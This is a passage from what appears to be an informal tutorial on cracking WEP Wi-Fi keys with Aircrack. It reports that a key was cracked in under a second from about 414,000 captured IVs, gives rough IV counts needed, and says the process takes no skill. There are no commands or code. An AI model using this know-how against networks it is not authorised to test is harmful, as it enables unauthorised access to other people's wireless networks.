With 413994 IV�s this key took Aircrack less than 1 second to crack. Which is an example of how good Aircrack truely is.
With 250,000 ish IV's chances are it would only take a few seconds more to crack but I like to collect a few more IV's
to be on the safe side.

Like I said the programmer has done all the hard work for us, we just need to tell it what to do. For an end users part WEP
cracking is not a skilful hack in any way whatsoever (we just tell Aircrack what we want it to do) unless you want to write your
own program for it!